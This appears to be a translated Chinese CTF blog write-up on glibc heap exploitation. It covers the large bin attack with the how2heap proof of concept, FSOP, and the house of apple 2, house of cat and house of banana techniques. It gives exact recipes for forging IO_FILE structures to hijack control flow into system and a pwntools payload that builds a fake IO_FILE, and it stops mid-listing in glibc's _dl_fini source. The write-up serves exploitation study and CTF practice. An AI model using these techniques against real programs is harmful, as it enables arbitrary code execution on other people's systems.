猫猫&&苹果香蕉の屋

ldrx30

2023-11-02

CTF

IO_FILE

Daigo: Wouldn't it work to just fight in the red form from the start?

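Preface

Recent glibc versions have removed the hook global variables such as __malloc_hook, __free_hook, and __realloc_hook.

Exploitation has therefore moved toward IO_FILE. As versions keep advancing, though, the available heap techniques keep shrinking, and the exploitable weaknesses in IO_FILE are gradually disappearing as well.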

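large bin attack

A large bin covers a range of sizes and keeps its chunks sorted. The article "浅析largebin attack" (a brief analysis of the largebin attack) has a diagram that makes this easier to follow.
Chunks of the same size are ordered by the time they were freed.

fd, bk: the doubly linked list of chunks in the bin; chunks of equal size sit next to each other in free order
fd_nextsize, bk_nextsize: the doubly linked list that connects chunks of different sizes
If the bin holds a single chunk, its fd and bk point to main_arena, and its fd_nextsize and bk_nextsize point to the chunk itself

The demonstration uses the how2heap large bin attack for glibc 2.36 directly (it works on glibc >= 2.30).

The vulnerable spot is quoted in the comment at the top of the file: it is the last assignment statement, reached when victim (the chunk being linked into the large bin) is smaller than every chunk already in the bin.
malloc two large chunks p1 and p2. The two 0x18 chunks keep neighbouring unsorted chunks from consolidating with each other and keep p2 from being merged into the top chunk.
Note that p1 must be larger than p2, but not by much: both have to fall into the same large bin.
free p1 and get p1 placed into the large bin.
free p2, then set p1's bk_nextsize to &target-0x20.
Get p2 placed into the large bin.
The value of target is now the address of p2.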

#include<stdio.h>
#include<stdlib.h>
#include<assert.h>

/*
A revisit to large bin attack for after glibc2.30

Relevant code snippet :
	// Only two chunks are involved, so the snippet can be read line by line.
	// In the source, bck comes from  bck = bin_at (av, victim_index);
	// av is the arena address, so bck is the bin header inside the arena
	// fwd = bck->fd;   the head of the bin's doubly linked list, which here is the existing p1
	if ((unsigned long) (size) < (unsigned long) chunksize_nomask (bck->bk)) {
		fwd = bck;                                    // fwd = arena
		bck = bck->bk;                                // bck = p1
		victim->fd_nextsize = fwd->fd;                // victim is p2, the chunk being put into the large bin
		victim->bk_nextsize = fwd->fd->bk_nextsize;   // victim.bk_nextsize = p1->bk_nextsize = &target-0x20
		fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;  // p1.bk_nextsize = victim
		// victim.bk_nextsize is &target-0x20, and writing that address's fd_nextsize stores victim into target
	}
	}
*/

int main(){
  /*Disable IO buffering to prevent stream from interfering with heap*/
  setvbuf(stdin,NULL,_IONBF,0);
  setvbuf(stdout,NULL,_IONBF,0);
  setvbuf(stderr,NULL,_IONBF,0);

  printf("\n\n");
  printf("Since glibc2.30, two new checks have been enforced on large bin chunk insertion\n\n");
  printf("Check 1 : \n");
  printf(">    if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd))\n");
  printf(">        malloc_printerr (\"malloc(): largebin double linked list corrupted (nextsize)\");\n");
  printf("Check 2 : \n");
  printf(">    if (bck->fd != fwd)\n");
  printf(">        malloc_printerr (\"malloc(): largebin double linked list corrupted (bk)\");\n\n");
  printf("This prevents the traditional large bin attack\n");
  printf("However, there is still one possible path to trigger large bin attack. The PoC is shown below : \n\n");
  
  printf("====================================================================\n\n");

  size_t target = 0;
  printf("Here is the target we want to overwrite (%p) : %lu\n\n",&target,target);
  size_t *p1 = malloc(0x428);
  printf("First, we allocate a large chunk [p1] (%p)\n",p1-2);
  size_t *g1 = malloc(0x18);
  printf("And another chunk to prevent consolidate\n");

  printf("\n");

  size_t *p2 = malloc(0x418);
  printf("We also allocate a second large chunk [p2]  (%p).\n",p2-2);
  printf("This chunk should be smaller than [p1] and belong to the same large bin.\n");
  size_t *g2 = malloc(0x18);
  printf("Once again, allocate a guard chunk to prevent consolidate\n");

  printf("\n");

  free(p1);
  printf("Free the larger of the two --> [p1] (%p)\n",p1-2);
  size_t *g3 = malloc(0x438);
  printf("Allocate a chunk larger than [p1] to insert [p1] into large bin\n");

  printf("\n");

  free(p2);
  printf("Free the smaller of the two --> [p2] (%p)\n",p2-2);
  printf("At this point, we have one chunk in large bin [p1] (%p),\n",p1-2);
  printf("               and one chunk in unsorted bin [p2] (%p)\n",p2-2);

  printf("\n");

  p1[3] = (size_t)((&target)-4);
  printf("Now modify the p1->bk_nextsize to [target-0x20] (%p)\n",(&target)-4);

  printf("\n");

  size_t *g4 = malloc(0x438);
  printf("Finally, allocate another chunk larger than [p2] (%p) to place [p2] (%p) into large bin\n", p2-2, p2-2);
  printf("Since glibc does not check chunk->bk_nextsize if the new inserted chunk is smaller than smallest,\n");
  printf("  the modified p1->bk_nextsize does not trigger any error\n");
  printf("Upon inserting [p2] (%p) into largebin, [p1](%p)->bk_nextsize->fd_nextsize is overwritten to address of [p2] (%p)\n", p2-2, p1-2, p2-2);

  printf("\n");

  printf("In our case here, target is now overwritten to address of [p2] (%p), [target] (%p)\n", p2-2, (void *)target);
  printf("Target (%p) : %p\n",&target,(size_t*)target);

  printf("\n");
  printf("====================================================================\n\n");

  assert((size_t)(p2-2) == target);

  return 0;
}

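The result is an arbitrary-address write of a heap address.
Before glibc 2.29, the unsorted bin attack and the large bin attack both targeted the bk pointer, but a check was added later.

During the attack, fd, bk, and fd_nextsize of p1 can be overwritten with anything; fd is repaired by the malloc call, because it ends up pointing to the smaller victim.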
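The write primitive can be replayed on a toy memory model. The sketch below is only an illustration: memory is a Python dict, the addresses are made up, and the function `insert_smaller_than_smallest` is a hypothetical name that mirrors the three assignments quoted in the how2heap comment, nothing more.

```python
# Toy model: memory is a dict mapping an address to an 8-byte value.
FD_NEXTSIZE = 0x20  # offset of fd_nextsize from the chunk header
BK_NEXTSIZE = 0x28  # offset of bk_nextsize from the chunk header


def insert_smaller_than_smallest(mem, p1, victim):
    """Mirror the assignments of the quoted branch, where fwd->fd is p1."""
    mem[victim + FD_NEXTSIZE] = p1
    mem[victim + BK_NEXTSIZE] = mem[p1 + BK_NEXTSIZE]
    # fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim
    mem[mem[victim + BK_NEXTSIZE] + FD_NEXTSIZE] = victim
    mem[p1 + BK_NEXTSIZE] = victim


# Made-up chunk header addresses and target address.
p1, p2, target = 0x555555559290, 0x5555555596E0, 0x7FFC00001000

# p1 alone in the bin: its nextsize pointers refer to itself.
mem = {p1 + FD_NEXTSIZE: p1, p1 + BK_NEXTSIZE: p1, target: 0}

mem[p1 + BK_NEXTSIZE] = target - 0x20      # the attacker's single overwrite
insert_smaller_than_smallest(mem, p1, p2)  # what the final malloc triggers

print(hex(mem[target]))  # 0x5555555596e0, the address of p2
```

The only attacker-controlled value is p1's bk_nextsize; the store into target happens as a side effect of the insertion.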

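IO flow

Here this means a call chain in which some function calls through a function pointer stored in a vtable.

The program exits through exit

Returning from main, after which glibc calls exit
Calling exit explicitly

malloc_assert: proposed in house of kiwi, triggered by any one of the following conditions

The size of the top chunk is smaller than MINSIZE (0x20)
The prev_inuse bit is 0
The end of old_top is not page-aligned
Starting with libc 2.36 this changed: the IO operations were removed, so the path is unusable from libc 2.36 on
libc 2.37 dropped the function entirely.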
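The three trigger conditions can be written down as a small predicate. This is a sketch under assumptions: it follows my reading of the assertion on the old top chunk in sysmalloc, ignores the "initial top" special case, and uses the hypothetical name `top_check_fails`; the addresses in the usage lines are made up.

```python
MINSIZE = 0x20     # minimum chunk size on 64-bit
PREV_INUSE = 0x1   # lowest bit of the size field
SIZE_BITS = 0x7    # the three flag bits stored in the size field


def top_check_fails(old_top, size_field, pagesize=0x1000):
    """Return True if a top chunk like this would trip the assertion."""
    old_size = size_field & ~SIZE_BITS
    old_end = old_top + old_size
    ok = (
        old_size >= MINSIZE
        and (size_field & PREV_INUSE) != 0
        and (old_end & (pagesize - 1)) == 0
    )
    return not ok


# A healthy top chunk: ends on a page boundary and has prev_inuse set.
print(top_check_fails(0x5555555592A0, 0x20D61))  # False
# The same chunk with the prev_inuse bit cleared by an overflow.
print(top_check_fails(0x5555555592A0, 0x20D60))  # True
```

The assertion is only evaluated when the request cannot be served from the current top chunk, so the corrupted size also has to be smaller than the requested size.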

libc 2.35:

Both calls (__fxprintf, fflush) involve IO operations.

static void
__malloc_assert (const char *assertion, const char *file, unsigned int line,
		 const char *function)
{
  (void) __fxprintf (NULL, "%s%s%s:%u: %s%sAssertion `%s' failed.\n",
		     __progname, __progname[0] ? ": " : "",
		     file, line,
		     function ? function : "", function ? ": " : "",
		     assertion);
  fflush (stderr);
  abort ();
}

FSOP

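FSOP hijacks the value of _IO_list_all (for example with a large bin attack) so that _IO_flush_all_lockp runs over attacker-controlled data; that function flushes every file stream on the list that starts at _IO_list_all.

When the program returns from main or calls exit, fcloseall is called, with the call chain shown below.

In the end every IO_FILE structure reachable from _IO_list_all is visited.
If the conditions are met, the function that the structure's vtable->__overflow pointer refers to is called.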

exit
	fcloseall
		_IO_cleanup
			_IO_flush_all_lockp
				_IO_OVERFLOW
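What "if the conditions are met" means during the list walk can be sketched as follows. This is a simplified model, not glibc code: the classes `File` and `WideData` and the functions `wants_overflow` and `flush_all` are hypothetical names, the condition follows my reading of _IO_flush_all_lockp, and locking plus the _vtable_offset test are left out.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class WideData:
    write_base: int = 0
    write_ptr: int = 0


@dataclass
class File:
    mode: int = 0
    write_base: int = 0
    write_ptr: int = 0
    wide: Optional[WideData] = None
    chain: Optional["File"] = None


def wants_overflow(fp):
    """Pending output in either the narrow or the wide buffer."""
    narrow = fp.mode <= 0 and fp.write_ptr > fp.write_base
    wide = (
        fp.mode > 0
        and fp.wide is not None
        and fp.wide.write_ptr > fp.wide.write_base
    )
    return narrow or wide


def flush_all(head):
    """Walk the _chain links and collect the streams that would get _IO_OVERFLOW."""
    called = []
    fp = head
    while fp is not None:
        if wants_overflow(fp):
            called.append(fp)
        fp = fp.chain
    return called


clean = File()                          # nothing buffered, skipped
fake = File(write_ptr=1, chain=clean)   # forged stream placed at the list head
print(len(flush_all(fake)))             # 1
```

A forged FILE therefore needs write_ptr > write_base (or the wide equivalent with _mode > 0) before its vtable is ever consulted.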

Calling a vtable function means calling through the jump table, for example __overflow.

IO_validate_vtable checks that the vtable is legitimate by testing whether its address lies inside a valid range. If it does not, the program is aborted.
Only then is the function in the vtable called.

#define _IO_OVERFLOW(FP, CH) JUMP1 (__overflow, FP, CH)
#define JUMP1(FUNC, THIS, X1) (_IO_JUMPS_FUNC(THIS)->FUNC) (THIS, X1)
#define _IO_JUMPS_FUNC(THIS) (IO_validate_vtable (_IO_JUMPS_FILE_plus (THIS)))

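The check function

It computes the offset of the structure's vtable from the global __io_vtables table.
Any table located inside that region passes the check.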

static inline const struct _IO_jump_t *
IO_validate_vtable (const struct _IO_jump_t *vtable)
{
  uintptr_t ptr = (uintptr_t) vtable;
  uintptr_t offset = ptr - (uintptr_t) &__io_vtables;
  if (__glibc_unlikely (offset >= IO_VTABLES_LEN))
    /* The vtable pointer is not in the expected section.  Use the
       slow path, which will terminate the process if necessary.  */
    _IO_vtable_check ();
  return vtable;
}
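The range test relies on unsigned wrap-around, which is easy to miss. A minimal sketch of the same arithmetic, with a hypothetical function name `vtable_in_range` and made-up values for the region start and length:

```python
MASK64 = (1 << 64) - 1


def vtable_in_range(vtable, io_vtables_start, io_vtables_len):
    """Same test as the fast path: unsigned (ptr - start) < length."""
    offset = (vtable - io_vtables_start) & MASK64  # emulate uintptr_t wrap-around
    return offset < io_vtables_len


START, LENGTH = 0x7FFFF7E16000, 0xD68    # made-up values for illustration

print(vtable_in_range(START + 0x10, START, LENGTH))     # True: inside the region
print(vtable_in_range(START - 8, START, LENGTH))        # False: wraps to a huge offset
print(vtable_in_range(0x55555555A000, START, LENGTH))   # False: a heap address
```

A pointer below the region start becomes a very large unsigned offset, so a single comparison covers both bounds.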

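So hijacking the vtable nowadays mostly means finding a table inside this region that fits the conditions.

One option is to go through the tables related to _wide_data, because _wide_data contains a vtable of its own and calls through it are not checked.

Three tables are relevant, namely the ones whose names start with _IO_wfile_jumps.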

#define _IO_WOVERFLOW(FP, CH) WJUMP1 (__overflow, FP, CH)
#define WJUMP1(FUNC, THIS, X1) (_IO_WIDE_JUMPS_FUNC(THIS)->FUNC) (THIS, X1)
#define _IO_WIDE_JUMPS_FUNC(THIS) _IO_WIDE_JUMPS(THIS)
#define _IO_WIDE_JUMPS(THIS) \
  _IO_CAST_FIELD_ACCESS ((THIS), struct _IO_FILE, _wide_data)->_wide_vtable

house of apple

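There are three variants; this is version 2.0 (house of apple 2), which takes control of the execution flow.

IO flow: exit or malloc_assert
The heap address and the libc address can be leaked
One largebin attack is available (once is enough)

The _IO_wide_data structure

It contains a vtable as well.
As the FSOP section shows, functions in the _wide_vtable table are also called through macros, but without any check, which makes them easier to abuse.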

struct _IO_wide_data
{
  wchar_t *_IO_read_ptr;    /* Current read pointer */
  wchar_t *_IO_read_end;    /* End of get area. */
  wchar_t *_IO_read_base;    /* Start of putback+get area. */
  wchar_t *_IO_write_base;    /* Start of put area. */
  wchar_t *_IO_write_ptr;    /* Current put pointer. */
  wchar_t *_IO_write_end;    /* End of put area. */
  wchar_t *_IO_buf_base;    /* Start of reserve area. */
  wchar_t *_IO_buf_end;        /* End of reserve area. */
  /* The following fields are used to support backing up and undo. */
  wchar_t *_IO_save_base;    /* Pointer to start of non-current get area. */
  wchar_t *_IO_backup_base;    /* Pointer to first valid character of
                   backup area */
  wchar_t *_IO_save_end;    /* Pointer to end of non-current get area. */
 
  __mbstate_t _IO_state;
  __mbstate_t _IO_last_state;
  struct _IO_codecvt _codecvt;
  wchar_t _shortbuf[1];
  const struct _IO_jump_t *_wide_vtable;
};

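Suppose the vtable has been hijacked to _IO_wfile_jumps and overflow is then called.

Because of the macro expansion, execution enters the overflow function of _IO_wfile_jumps.
That function executes as follows.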

wint_t _IO_wfile_overflow(FILE *f, wint_t wch) {
  if (f->_flags & _IO_NO_WRITES) /* SET ERROR */
  {
    f->_flags |= _IO_ERR_SEEN;
    __set_errno(EBADF);
    return WEOF;
  }
  /* If currently reading or no buffer allocated. */
  if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0 ||
      f->_wide_data->_IO_write_base == NULL) {
    /* Allocate a buffer if needed. */
    if (f->_wide_data->_IO_write_base == 0) {
      _IO_wdoallocbuf(f);
      _IO_free_wbackup_area(f);
      _IO_wsetg(f, f->_wide_data->_IO_buf_base, f->_wide_data->_IO_buf_base,
                f->_wide_data->_IO_buf_base);

      if (f->_IO_write_base == NULL) {
        _IO_doallocbuf(f);
        _IO_setg(f, f->_IO_buf_base, f->_IO_buf_base, f->_IO_buf_base);
      }
    } else {
      /* Otherwise must be currently reading.  If _IO_read_ptr
         (and hence also _IO_read_end) is at the buffer end,
         logically slide the buffer forwards one block (by setting
         the read pointers to all point at the beginning of the
         block).  This makes room for subsequent output.
         Otherwise, set the read pointers to _IO_read_end (leaving
         that alone, so it can continue to correspond to the
         external position). */
      if (f->_wide_data->_IO_read_ptr == f->_wide_data->_IO_buf_end) {
        f->_IO_read_end = f->_IO_read_ptr = f->_IO_buf_base;
        f->_wide_data->_IO_read_end = f->_wide_data->_IO_read_ptr =
            f->_wide_data->_IO_buf_base;
      }
    }
    f->_wide_data->_IO_write_ptr = f->_wide_data->_IO_read_ptr;
    f->_wide_data->_IO_write_base = f->_wide_data->_IO_write_ptr;
    f->_wide_data->_IO_write_end = f->_wide_data->_IO_buf_end;
    f->_wide_data->_IO_read_base = f->_wide_data->_IO_read_ptr =
        f->_wide_data->_IO_read_end;

    f->_IO_write_ptr = f->_IO_read_ptr;
    f->_IO_write_base = f->_IO_write_ptr;
    f->_IO_write_end = f->_IO_buf_end;
    f->_IO_read_base = f->_IO_read_ptr = f->_IO_read_end;

    f->_flags |= _IO_CURRENTLY_PUTTING;
    if (f->_flags & (_IO_LINE_BUF | _IO_UNBUFFERED))
      f->_wide_data->_IO_write_end = f->_wide_data->_IO_write_ptr;
  }
  if (wch == WEOF) return _IO_do_flush(f);
  if (f->_wide_data->_IO_write_ptr == f->_wide_data->_IO_buf_end)
    /* Buffer is really full */
    if (_IO_do_flush(f) == EOF) return WEOF;
  *f->_wide_data->_IO_write_ptr++ = wch;
  if ((f->_flags & _IO_UNBUFFERED) ||
      ((f->_flags & _IO_LINE_BUF) && wch == L'\n'))
    if (_IO_do_flush(f) == EOF) return WEOF;
  return wch;
}
libc_hidden_def(_IO_wfile_overflow)

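The function calls are what matter here; the chains below are the ones given by the author of house of apple.

Chain 1: _IO_wfile_overflow controls the execution flow, but some checks have to be bypassed. Forge fp as follows:

_flags is set to ~(2 | 0x8 | 0x800); if rdi does not need to be controlled, 0 is enough; to get a shell it can be set to "  sh;" (with two leading spaces)
vtable is set to the address of _IO_wfile_jumps/_IO_wfile_jumps_mmap/_IO_wfile_jumps_maybe_mmap (plus or minus an offset) so that _IO_wfile_overflow ends up being called
_wide_data is set to a controllable heap address A, i.e. *(fp + 0xa0) = A
_wide_data->_IO_write_base is set to 0, i.e. *(A + 0x18) = 0
_wide_data->_IO_buf_base is set to 0, i.e. *(A + 0x30) = 0
_wide_data->_wide_vtable is set to a controllable heap address B, i.e. *(A + 0xe0) = B
_wide_data->_wide_vtable->doallocate is set to an address C that hijacks RIP, i.e. *(B + 0x68) = C; C can be system, for example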

_IO_wfile_overflow
    _IO_wdoallocbuf
        _IO_WDOALLOCATE
            *(fp->_wide_data->_wide_vtable + 0x68)(fp)
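The chain 1 field list translates into a flat byte image fairly directly. The sketch below uses only the standard library; `build_chain1` and `put` are hypothetical helpers, the placement of A and B at +0x100 and +0x200 inside one buffer is an arbitrary choice, the vtable offset 0xd8 is assumed for 64-bit glibc, and all addresses are made up. The conditions of whichever path reaches _IO_OVERFLOW are not set here.

```python
import struct


def put(buf, off, value):
    """Store a 64-bit little-endian value at the given offset."""
    struct.pack_into("<Q", buf, off, value)


def build_chain1(fp_addr, wfile_jumps, call_target):
    """Lay out fp, A (_wide_data) and B (_wide_vtable) in one controlled buffer."""
    a_off, b_off = 0x100, 0x200               # arbitrary placement of A and B
    buf = bytearray(0x300)
    buf[0:8] = b"  sh;\x00\x00\x00"           # _flags, also the string rdi points to
    put(buf, 0xA0, fp_addr + a_off)           # fp->_wide_data = A
    put(buf, 0xD8, wfile_jumps)               # fp->vtable
    put(buf, a_off + 0x18, 0)                 # A->_IO_write_base = 0
    put(buf, a_off + 0x30, 0)                 # A->_IO_buf_base = 0
    put(buf, a_off + 0xE0, fp_addr + b_off)   # A->_wide_vtable = B
    put(buf, b_off + 0x68, call_target)       # B->doallocate = C
    return bytes(buf)


# Made-up addresses standing in for the leaked heap and libc values.
image = build_chain1(0x55555555A000, 0x7FFFF7E170C0, 0x7FFFF7C50D70)

flags = struct.unpack_from("<I", image, 0)[0]
print(hex(flags), flags & (0x2 | 0x8 | 0x800))  # 0x68732020 0
```

The last line shows why two leading spaces are used: the resulting _flags value has none of the bits 0x2, 0x8, or 0x800 set.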

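Chain 2: _IO_wfile_underflow_mmap controls the execution flow

_flags is set to ~4; if rdi does not need to be controlled, 0 is enough; to get a shell it can be set to " sh;" (note the single leading space)
vtable is set to the address of _IO_wfile_jumps_mmap (plus or minus an offset) so that _IO_wfile_underflow_mmap ends up being called
_IO_read_ptr < _IO_read_end, i.e. *(fp + 8) < *(fp + 0x10)
_wide_data is set to a controllable heap address A, i.e. *(fp + 0xa0) = A
_wide_data->_IO_read_ptr >= _wide_data->_IO_read_end, i.e. *A >= *(A + 8)
_wide_data->_IO_buf_base is set to 0, i.e. *(A + 0x30) = 0
_wide_data->_IO_save_base is set to 0 or to a valid address that can be freed, i.e. *(A + 0x40) = 0
_wide_data->_wide_vtable is set to a controllable heap address B, i.e. *(A + 0xe0) = B
_wide_data->_wide_vtable->doallocate is set to an address C that hijacks RIP, i.e. *(B + 0x68) = C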

_IO_wfile_underflow_mmap
    _IO_wdoallocbuf
        _IO_WDOALLOCATE
            *(fp->_wide_data->_wide_vtable + 0x68)(fp)

Chain 3: _IO_wdefault_xsgetn controls the execution flow

_flags is set to 0x800
vtable is set to the address of _IO_wstrn_jumps/_IO_wmem_jumps/_IO_wstr_jumps (plus or minus an offset) so that _IO_wdefault_xsgetn ends up being called
_mode is set to a value greater than 0, i.e. *(fp + 0xc0) > 0
_wide_data is set to a controllable heap address A, i.e. *(fp + 0xa0) = A
_wide_data->_IO_read_end == _wide_data->_IO_read_ptr (both can be 0), i.e. *(A + 8) = *A
_wide_data->_IO_write_ptr > _wide_data->_IO_write_base, i.e. *(A + 0x20) > *(A + 0x18)
_wide_data->_wide_vtable is set to a controllable heap address B, i.e. *(A + 0xe0) = B
_wide_data->_wide_vtable->overflow is set to an address C that hijacks RIP, i.e. *(B + 0x18) = C

_IO_wdefault_xsgetn
    __wunderflow
        _IO_switch_to_wget_mode
            _IO_WOVERFLOW
                *(fp->_wide_data->_wide_vtable + 0x18)(fp)

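To summarize: use a largebin attack to hijack the _IO_list_all variable

Replace it with a forged IO_FILE structure (a heap chunk whose contents we control)
Forge the IO_FILE's _wide_data as a controllable heap region, which in turn lets _wide_data->_wide_vtable point to a controllable heap region
Forge the IO_FILE's vtable as _IO_wfile_jumps; this is a const variable, and gdb shows it with p &_IO_wfile_jumps
When a single call is not enough and a ROP chain is needed, point C at a pivot and fill a heap region with the chain. setcontext is commonly used for this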

house of cat

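Function call chain

The attack goes through _IO_wfile_seekoff in _IO_wfile_jumps and from there into _IO_switch_to_wget_mode.

__malloc_assert
	__fxprintf
		locked_vfxprintf
			__vfprintf_internal # goes through IO_validate_vtable and calls the function below via vtable+0x38
				_IO_wfile_seekoff
					_IO_switch_to_wget_mode
						call qword ptr [rax + 0x18] # rax points into the forged IO_FILE

house of cat also works under FSOP: it is enough to shift the vtable pointer by an offset so that _IO_wfile_seekoff gets called (usually it is combined with __malloc_assert, with vtable changed to _IO_wfile_jumps+0x10).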

off64_t
_IO_wfile_seekoff (FILE *fp, off64_t offset, int dir, int mode)
{
  off64_t result;
  off64_t delta, new_offset;
  long int count;

  if (mode == 0)
    return do_ftell_wide (fp);

  int must_be_exact = ((fp->_wide_data->_IO_read_base
			== fp->_wide_data->_IO_read_end)
		       && (fp->_wide_data->_IO_write_base
			   == fp->_wide_data->_IO_write_ptr));

  bool was_writing = ((fp->_wide_data->_IO_write_ptr
		       > fp->_wide_data->_IO_write_base)
		      || _IO_in_put_mode (fp));
    
  if (was_writing && _IO_switch_to_wget_mode (fp))   // xxxx
    return WEOF;
    ......
}
libc_hidden_def (_IO_wfile_seekoff)

This is where the __overflow entry of the vtable inside _wide_data is called, through a JUMP-style macro and without any check

int
_IO_switch_to_wget_mode (FILE *fp)
{
  if (fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base)
    if ((wint_t)_IO_WOVERFLOW (fp, WEOF) == WEOF)
      return EOF;
    ......
}
libc_hidden_def (_IO_switch_to_wget_mode)

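Debugging _IO_switch_to_wget_mode shows the following assembly

rdi is the fp pointer, an IO_FILE that we can forge.
rdi controls rax, rax in turn controls rdx, and the jbe instruction can be passed as well, so the final call lands on code of our choosing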

0x7f4cae745d30 <_IO_switch_to_wget_mode>       endbr64
 0x7f4cae745d34 <_IO_switch_to_wget_mode+4>     mov    rax, qword ptr [rdi + 0xa0]
 0x7f4cae745d3b <_IO_switch_to_wget_mode+11>    push   rbx
 0x7f4cae745d3c <_IO_switch_to_wget_mode+12>    mov    rbx, rdi
 0x7f4cae745d3f <_IO_switch_to_wget_mode+15>    mov    rdx, qword ptr [rax + 0x20]
 0x7f4cae745d43 <_IO_switch_to_wget_mode+19>    cmp    rdx, qword ptr [rax + 0x18]
 0x7f4cae745d47 <_IO_switch_to_wget_mode+23>    jbe    _IO_switch_to_wget_mode+56                <_IO_switch_to_wget_mode+56>

 0x7f4cae745d49 <_IO_switch_to_wget_mode+25>    mov    rax, qword ptr [rax + 0xe0]
 0x7f4cae745d50 <_IO_switch_to_wget_mode+32>    mov    esi, 0xffffffff
 0x7f4cae745d55 <_IO_switch_to_wget_mode+37>    call   qword ptr [rax + 0x18]

The final forgery therefore looks like this

rax1 is the first rax above (loaded from [rdi + 0xa0])
rax2 is the second rax (loaded from [rax + 0xe0])

from pwn import p64                                  # pwntools
# heapbase, libcbase, rdi and call_addr come from the rest of the exploit

fake_io_addr = heapbase+0xb00                        # address of the forged IO_FILE structure
next_chain = 0
fake_IO_FILE = p64(rdi)                              # _flags=rdi
fake_IO_FILE += p64(0)*7
fake_IO_FILE += p64(1)+p64(2)                        # rcx!=0(FSOP)
fake_IO_FILE += p64(fake_io_addr+0xb0)               # _IO_backup_base=rdx
fake_IO_FILE += p64(call_addr)                       # _IO_save_end=call addr(call setcontext/system)
fake_IO_FILE = fake_IO_FILE.ljust(0x68, b'\x00')
fake_IO_FILE += p64(0)                               # _chain
fake_IO_FILE = fake_IO_FILE.ljust(0x88, b'\x00')
fake_IO_FILE += p64(heapbase+0x1000)                 # _lock = a writable address
fake_IO_FILE = fake_IO_FILE.ljust(0xa0, b'\x00')
fake_IO_FILE += p64(fake_io_addr+0x30)               # _wide_data, rax1_addr
fake_IO_FILE = fake_IO_FILE.ljust(0xc0, b'\x00')
fake_IO_FILE += p64(1)                               # mode=1
fake_IO_FILE = fake_IO_FILE.ljust(0xd8, b'\x00')
fake_IO_FILE += p64(libcbase+0x2160c0+0x10)          # vtable=IO_wfile_jumps+0x10
fake_IO_FILE += p64(0)*6
fake_IO_FILE += p64(fake_io_addr+0x40)               # rax2_addr
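The register walk from the _IO_switch_to_wget_mode listing can be replayed on the offsets this layout uses, which is a quick way to check that the overlapping fields line up. This is a toy model: memory is a dict, `switch_to_wget_mode` is a hypothetical Python stand-in for the assembly, and the two addresses are made up.

```python
def switch_to_wget_mode(mem, rdi):
    """Follow the loads in the listing; return (call target, rdx) or None."""
    rax1 = mem[rdi + 0xA0]             # mov rax, [rdi + 0xa0]   (_wide_data)
    rdx = mem[rax1 + 0x20]             # mov rdx, [rax + 0x20]   (_IO_write_ptr)
    if rdx <= mem[rax1 + 0x18]:        # cmp / jbe: nothing to flush, no call
        return None
    rax2 = mem[rax1 + 0xE0]            # mov rax, [rax + 0xe0]   (_wide_vtable)
    return mem[rax2 + 0x18], rdx       # call [rax + 0x18]


fake = 0x55555555AB00                  # made-up fake_io_addr
call_addr = 0x7FFFF7C50D70             # made-up stand-in for setcontext/system

# Only the slots the walk touches, at the offsets where the payload places them.
mem = {
    fake + 0x48: 2,                    # p64(2): read as _wide_data->_IO_write_base
    fake + 0x50: fake + 0xB0,          # read as _wide_data->_IO_write_ptr, ends up in rdx
    fake + 0x58: call_addr,            # read as the __overflow slot of the fake wide vtable
    fake + 0xA0: fake + 0x30,          # _wide_data (rax1)
    fake + 0x110: fake + 0x40,         # _wide_data->_wide_vtable (rax2)
}

target, rdx = switch_to_wget_mode(mem, fake)
print(hex(target), hex(rdx))
```

Because _wide_data points back into the fake FILE at +0x30, the same few qwords serve as FILE fields, wide-data fields, and the wide vtable at once.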

house of banana

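This one is not an IO_FILE technique. When a program exits through exit, it calls a series of functions reached through a structure named _rtld_global to do things such as restoring registers and flushing buffers.

An arbitrary address can be overwritten with a heap address (usually by a large bin attack)
The program can return from main or call exit
The libc address and the heap address can be leaked

Useful gdb commands

The structure lives in ld.so, so its address cannot be obtained from libc.sym

p &(_rtld_global._dl_ns._ns_loaded->l_next->l_next->l_next)
p &_rtld_global

The _rtld_global structure contains the _dl_ns structures. A normal return from main or a call to exit triggers the call chain exit() -> _dl_fini -> _dl_call_fini -> ((fini_t) array[i])().

The source below is from glibc 2.37 or later. Compared with earlier source, the main change is the call _dl_call_fini(l);. Stepping into that function shows that apart from the routine that prints debugging information, nothing else changed.
The link_maps are connected in a doubly linked list.
nmaps is the number of elements in maps[], i.e. GL(dl_ns)[ns]._ns_nloaded
It is worth writing a small program and printing these variables yourself. The values observed here are added as comments below.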

// pwndbg> p _rtld_global 
#define GL(name) _rtld_global._##name

void _dl_fini(void) {
#ifdef SHARED
  int do_audit = 0;
again:
#endif

  // pwndbg> p _rtld_global._dl_nns  =>  1
  for (Lmid_t ns = GL(dl_nns) - 1; ns >= 0; --ns) {
  
    /* Protect against concurrent loads and unloads.  */
    __rtld_lock_lock_recursive(GL(dl_load_lock));

	// pwndbg> p _rtld_global._dl_ns[0]._ns_nloaded  => 4
    unsigned int nloaded = GL(dl_ns)[ns]._ns_nloaded;
    
    /* No need to do anything for empty namespaces or those used for
       auditing DSOs.  */
    if (nloaded == 0
#ifdef SHARED
        || GL(dl_ns)[ns]._ns_loaded->l_auditing != do_audit
#endif
    )
      __rtld_lock_unlock_recursive(GL(dl_load_lock));
    else {
#ifdef SHARED
      _dl_audit_activity_nsid(ns, LA_ACT_DELETE);
#endif

      /* Now we can allocate an array to hold all the pointers and
         copy the pointers in.  */
	  // nloaded => 4
      struct link_map *maps[nloaded];

      unsigned int i;
      struct link_map *l;
      assert(nloaded != 0 || GL(dl_ns)[ns]._ns_loaded == NULL);

	  // ns=0    pwndbg> p _rtld_global._dl_ns[0]._ns_loaded
	  // pwndbg> p _rtld_global._dl_ns[0]._ns_loaded.l_next.l_next.l_next.l_next  keep following l_next until it prints 0
      for (l = GL(dl_ns)[ns]._ns_loaded, i = 0; l != NULL; l = l->l_next)
        /* Do not handle ld.so in secondary namespaces.  */
        // pwndbg> p _rtld_global._dl_ns[0]._ns_loaded.l_real
        // this if branch has to be taken
        if (l == l->l_real) {
          assert(i < nloaded);   // so there can be at most 4

          maps[i] = l;
          l->l_idx = i;
          ++i;

          /* Bump l_direct_opencount of all objects so that they
             are not dlclose()ed from underneath us.  */
          ++l->l_direct_opencount;
        }
      assert(ns != LM_ID_BASE || i == nloaded);  // one of the checks to pass: i == nloaded, so every entry has to take the if branch.
      assert(ns == LM_ID_BASE || i == nloaded || i == nloaded - 1);
      // nmaps = 4
      unsigned int nmaps = i;

      /* Now we have to do the sorting.  We can skip looking for the
         binary itself which is at the front of the search list for
